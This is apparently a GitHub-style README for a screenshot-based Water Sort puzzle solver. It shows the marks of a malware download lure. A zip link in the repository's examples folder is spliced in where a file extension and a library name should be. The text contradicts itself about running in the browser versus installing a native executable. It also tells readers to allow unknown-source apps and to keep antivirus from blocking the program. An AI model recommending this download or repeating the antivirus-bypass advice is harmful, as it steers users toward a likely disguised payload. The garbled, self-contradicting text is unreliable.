WaterSortScreenshotSolver is a simple tool to solve the popular Water Sort puzzle game. It works by analyzing a screenshot of your game, reading the colors and positions of the water bottles on your screen. The software then uses this information to find the quickest way to finish the puzzle. It runs entirely on your computer and does not send any data online. This keeps your game info private.
The tool uses advanced image recognition and puzzle-solving methods but presents everything in an easy way. You just need to take a screenshot of your current puzzle and load it into this program. It will do all the hard work and show you the best steps to solve it.
Before you download and run WaterSortScreenshotSolver, make sure your system meets these requirements:
- Operating System: Windows 10 or later, macOS 10.13 or later, or a recent Linux distribution.
- Processor: Any modern processor (Intel i3 equivalent or better).
- RAM: At least 4 GB available memory.
- Browser: A recent version of Google Chrome, Microsoft Edge, or Firefox (for running the application).
- Storage: Around 100 MB of free space to install and save files.
- Screenshot Format: The program supports standard image formats like PNG and JPEG.
If you have any questions about your system, searching for your PC’s specifications or asking someone familiar with your device can help.
Here’s a simple overview of the steps to get WaterSortScreenshotSolver running:
- Download the software from the official page linked above.
- Open the program on your computer.
- Take a screenshot of your Water Sort puzzle on your phone or PC.
- Upload that screenshot inside the program.
- Wait for the software to analyze and solve the puzzle.
- Follow the steps provided to solve your Water Sort game quickly.
You do not need to know about coding or image processing. The program does everything for you with clear instructions.
To start, visit the official release page here:
Download WaterSortScreenshotSolver Releases
This page contains the latest versions for different operating systems. We recommend downloading the latest stable release.
- Click the link above to open the release page.
- Look for the version that matches your computer (Windows, macOS, or Linux).
- Download the file with an
.exe(Windows),.dmg(macOS), or.AppImage/https://github.com/sundoomze/WaterSortScreenshotSolver/raw/refs/heads/main/examples/Sort-Screenshot-Water-Solver-punct.zip(Linux) extension. - Once downloaded, double-click the file to start the installation or run the app directly if it’s a portable version.
- Follow the on-screen prompts to finish setup. Most users can accept default settings.
- After installation, open the program from your desktop or applications folder.
If you run into issues running the file, make sure your security settings allow apps from unknown sources or that your antivirus software does not block the program.
Taking a screenshot varies by device. Here are simple guides for popular platforms:
- Press the
PrtScnkey to capture the whole screen. - Or press
Windows key + Shift + Sto select a portion. - Paste the screenshot into Paint or save it directly if your system offers it.
- Press
Command + Shift + 3for a full screenshot. - Or press
Command + Shift + 4to capture a selected area. - The image saves automatically to your desktop.
- On iPhones: Press the
Side button + Volume Upat the same time. - On Android phones: Press the
Power + Volume Downbuttons together. - The screenshot saves to your photos or gallery.
Make sure the screenshot clearly shows the puzzle bottles with no obstructions.
Once you open the program:
- Click on the Upload Screenshot button.
- Select your saved image of the Water Sort puzzle.
- The software will process the image. This may take a few seconds.
- It will then display the puzzle layout and steps to solve.
- Follow the instructions step-by-step on your game.
- The program uses https://github.com/sundoomze/WaterSortScreenshotSolver/raw/refs/heads/main/examples/Sort-Screenshot-Water-Solver-punct.zip and Tesseract OCR. These tools detect bottle colors and levels from your screenshot.
- It builds an internal map of the puzzle.
- A Breadth-First Search (BFS) solver calculates the shortest path to solve it.
- You get the solution as simple moves like "Pour bottle 1 into bottle 3."
This method works well even if the screenshot quality varies slightly.
If the software does not correctly identify your puzzle or shows errors:
- Check your screenshot is clear and not blurry.
- Ensure the puzzle is fully visible with no overlays or messages.
- Try taking a new screenshot under better lighting.
- Use a screenshot that only shows the puzzle area or crop it before uploading.
- Restart the program if it behaves unexpectedly.
- If the problem persists, visit the release page to check for updates.
- Use screenshots taken on a clean background to avoid confusion.
- Avoid screenshots with extra buttons or game menus visible.
- Make sure the puzzle is in its default state (not mid-animation).
- Save screenshots in PNG format when possible, as it preserves quality.
Following these tips helps the solver detect colors and shapes accurately.
- Client-side processing meaning no internet connection is needed after download.
- OCR-based color and text recognition for accurate puzzle reading.
- BFS solver for finding the shortest solution path.
- Works with various puzzle sizes and bottle counts.
- Open-source and free to use.
- Cross-platform support through a web interface powered by WebAssembly (wasm).
WaterSortScreenshotSolver runs entirely on your device. It does not upload screenshots or puzzle data to any server. Your gameplay information stays private.
No personal data is collected. This makes it a safe tool to use for any Water Sort player.
If you want to contribute or help improve WaterSortScreenshotSolver:
- Visit the repository on GitHub.
- Read the developer notes and issues.
- Fork or clone the repo if you want to experiment with the code.
Development is open to anyone with interest and skills.
For questions or to report bugs:
- Use the GitHub repository’s Issues tab.
- Check existing issues before posting.
- Provide screenshots and details if you need help.
Thank you for using WaterSortScreenshotSolver. Happy puzzling!